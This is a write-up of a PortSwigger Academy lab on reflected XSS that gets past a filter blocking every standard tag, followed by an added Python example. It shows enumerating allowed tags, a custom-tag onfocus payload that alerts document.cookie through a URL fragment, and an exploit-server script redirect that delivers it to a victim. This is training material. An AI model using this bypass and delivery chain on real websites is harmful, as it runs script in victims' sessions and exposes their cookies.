Solving Portswigger Academy: Reflected XSS into HTML context with all tags blocked except custom ones
This lab blocks all HTML tags except custom ones.
To solve the lab, perform a cross-site scripting attack that injects a custom tag and automatically alerts document.cookie.
Let's access the lab; you will see the search box. I first used an img tag to test, but the response said “Tag is not allowed”.
Then I brute-forced tag names with Burp Intruder and found that the tags below are allowed.

Since the lab description mentions custom tags, I decided to use one. Then I looked for an event handler that does not require user interaction. The PortSwigger XSS cheat sheet lists onfocus as one that fires without interaction, provided the element is made focusable with tabindex and the browser focuses it on page load, which happens when the URL fragment matches the element's id.

Let's first test the payload above in the browser and confirm the alert box appears.

I first tried delivering it inside an iframe on the exploit server, but the iframe did not load when I stored and viewed the exploit.

Let's use a script tag on the exploit server instead, and it works.


Let's deliver it to the victim. That solves the lab.
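The whole procedure above (sweeping tag names the way Intruder does, crafting the custom-tag payload, and delivering it from the exploit server) as an added Python example. This is not the blog's or PortSwigger's code: the filter is a constructed stand-in with an assumed, shortened tag list, the lab host is a placeholder, and `lab_search`, `enumerate_tags`, `build_payload`, `build_exploit_url` and `exploit_server_body` are names chosen here. The payload follows the cheat sheet's custom-tag form (tabindex plus onfocus, focused through the URL fragment).

```python
import re
from urllib.parse import quote

# Constructed stand-in for the lab's server-side filter. Assumption: it rejects a
# search term when any tag name in it is a standard HTML element and otherwise
# reflects the term into the page unescaped (the real lab's list is much longer).
STANDARD_TAGS = {
    "a", "audio", "body", "button", "details", "div", "embed", "form", "iframe",
    "img", "input", "object", "p", "script", "span", "style", "svg", "video",
}
TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z][\w-]*)")
BLOCKED = "Tag is not allowed"


def lab_search(term):
    """Simulated response body for GET /?search=<term>."""
    for name in TAG_RE.findall(term):
        if name.lower() in STANDARD_TAGS:
            return BLOCKED
    return f"<h1>0 search results for '{term}'</h1>"


def enumerate_tags(candidates, send=lab_search):
    """Intruder-style sweep: submit <tag> once per candidate and keep the survivors.
    Replace `send` with a real HTTP request to run this against the lab."""
    return [t for t in candidates if BLOCKED not in send(f"<{t}>")]


def build_payload(tag="xss", elem_id="x"):
    """Custom tag that is focusable (tabindex) and alerts the cookie on focus."""
    return f"<{tag} id={elem_id} onfocus=alert(document.cookie) tabindex=1>"


def build_exploit_url(lab_host, tag="xss", elem_id="x"):
    """URL the victim must visit. The query is percent-encoded; the fragment is not,
    because the browser uses it to focus the element with that id, firing onfocus
    with no user interaction."""
    encoded = quote(build_payload(tag, elem_id), safe="")
    return f"https://{lab_host}/?search={encoded}#{elem_id}"


def exploit_server_body(url):
    """Page stored on the exploit server. <script> is blocked in the search term,
    so the redirect lives here, on a host we control, not in the payload."""
    return f"<script>location = '{url}';</script>"


if __name__ == "__main__":
    print(enumerate_tags(["img", "script", "svg", "iframe", "xss", "custom-tag"]))
    print(exploit_server_body(build_exploit_url("YOUR-LAB-ID.web-security-academy.net")))
```

Note that the `#x` fragment is never sent to the server, so the filter cannot see or strip it; only the percent-encoded query reaches the lab and is reflected.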
